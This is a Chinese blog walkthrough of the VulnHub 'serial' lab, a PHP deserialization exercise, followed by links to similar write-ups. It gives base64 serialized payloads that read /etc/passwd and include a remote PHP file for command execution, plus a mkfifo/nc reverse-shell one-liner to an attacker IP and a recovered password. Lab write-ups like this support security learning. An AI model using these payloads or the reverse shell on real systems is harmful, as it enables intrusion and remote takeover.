靶机serial

最新推荐文章于 2024-09-25 15:02:10 发布
最新推荐文章于 2024-09-25 15:02:10 发布
阅读量397 收藏 3
点赞数 3
文章标签: android web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhdbk______/article/details/140858122
版权
1.扫描IP和目录

index.php界面查看网络-->图像-->cooike

进行base64位编码

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

2./backup发现是压缩包下载发现三个php

代码审计:发现有unserialize

可以构造payload

运行一下

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

3.将/etc/passwd改成本机的txt文档

然后运行一下得出:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6Mjc6Imh0dHA6Ly8xOTIuMTY4LjMuMTU1LzExLnBocCI7fX0=

将Cookie替换

?cmd=id发现显示

4.反弹shell

kali开启监听,反弹shell

将id替换为:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.238.132+7777+>/tmp/f

进入靶机

得到密码:KywZmnPWW6tTbW5w

lhdbk______
关注
php反序列化靶机serial实战
zzgslh的博客
04-07 1261
靶机描述 今天研究一下php反序列化,靶机serial实战。目标为获取root权限。 靶机信息 可以去vulhub上下载此靶机: https://www.vulnhub.com/entry/serial-1,349/ 下载好,之后,使用Vmware新建虚拟机打开,步骤如下: 1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的...
php 靶机,php反序列化靶机serial实战
weixin_39552037的博客
03-10 391
靶机描述今天研究一下php反序列化,靶机serial实战。目标为获取root权限。靶机信息可以去vulhub上下载此靶机:https://www.vulnhub.com/entry/serial-1,349/下载好,之后,使用Vmware新建虚拟机打开,步骤如下:1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。 ...
反序列化靶机serial复现
muyuchen110的博客
08-01 752
【代码】反序列化靶机serial复现。
反序列化靶机serial
weixin_71053667的博客
08-01 532
通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马。
serial靶机
weixin_66503195的博客
08-01 379
发现cookie是base64加密过的,解密后发现是经过序列化过的。经过代码审计可构造payload,尝试读取passwd文件。F12查看,是一串base64编码。用御剑扫描得到backup路径。得到三个php文件他们放一起。
靶机复现】反序列化靶机serial实战
qq_70836100的博客
08-01 193
我们对之前拿到的cookie进行base64解码。虽然无响应但是反弹shell成功。抓包得到加密后的cokkie。点击bak.zip下载并访问。再访问一次得到新的加密文。然后我们去找他的账号密码。这里的乱码应该是%00。验证payload正确。扫描80端口下的目录。
反序列化靶机serial漏洞复现 超详细教程
qq_48368964的博客
08-01 801
漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 访问下web 抓一下包发到重放器中看看 发现 cook 是被加密的解码网址:Base64 在线编码解码 | Base64 加密解密 - Base64.us下载下来三个文件 index.php: user.class.php:
反序列化靶机serial实战
m0_63944205的博客
08-01 302
页面只有一行文本:Hello sk4This is a beta test for new cookie handler,提示这里是新cookie进行程序测试,那我们查看cookie。这里我们没有看到任何可控的参数,也没有可输入的内容,我们也不清楚目录结构,那么我们可以尝试去扫描目录。我们拿到加密后的字符序列去进行抓包,并将字符序列替换到如图。我们发现命令成功,然后我们修改py.php代码为。我们发现一个压缩包,将他下载下来看看。解码后发现是一串字符序列。得到一串加密后的字符序列。放到www文件夹下访问。
serial靶机教程
a666666688的博客
08-06 645
index.php⽂件中包含user.class.php⽂件且对cookie中的user参数进⾏了序列化和base64编码。user.class.php⽂件包含log.class.php⽂件且定义了Welcome和User两个类并调⽤了。log.class.php定义了Log类和成员变量type_log且handler函数对变量进⾏了⽂件包含和输出。对⽹站进⾏⼀个访问,⼤概意思为这是对新的cookie处理程序的测试版暂且搁置。log.class.php⽂件中的handler函数。
『VulnHub系列』serial: 2-Walkthrough
ins1ght的博客
11-10 1929
靶机发布日期:2019年9月27日,难度:中等++。用到了apk逆向和ELF中的ROP技术,web狗(小白)表示伤不起,一路硬刚下来的,求鼓励~
HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 8214
HTB Cerberus hard!!!靶机writeUp
【vulnhub】BTRsys-2 靶机
Nicky_Zheng的博客
01-29 1260
1、信息收集 1.1、端口扫描 使用netdiscor或arp获取到靶机 ip:192.168.57.137 使用nmap获取端口信息 kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( http
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
热门推荐
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2714
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
Unity android 接USBCamera
Cat的博客
09-23 544
3.在android工程中找到AndroidManifest.xml加入usb权限相关。1. unity打包android后,链接USB摄像头,需要USB权限。2.导出android工程。
Android Camera 预览角度和拍照保存图片角度相关
sinat_37429535的博客
09-23 1179
基于Android R(11)
Android 已经过时的方法用什么新方法替代?
最新发布
赵星海的博客
09-25 344
【代码】Android 已经过时的方法用什么新方法替代?
使用Charles抓包Android App数据
CYRUS STUDIO
09-23 650
分别点击 Web Proxy、Seure Web Proxy 和 SOCKS Proxy 设置一下Clash的地址和端口。把证书 push 到 /system/etc/security/cacerts(系统证书目录)比如这里得到的hash值为e4473cf9,把证书的文件名改为 e4473cf9.0。通过 ipconfg 或者打开【网络和Internet】找到电脑的 ip 地址。手机设置中打开【信任的凭据】【系统】可以看到已经有charles的证书了。电脑开启共享热点,手机连接热点并设置代理。
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值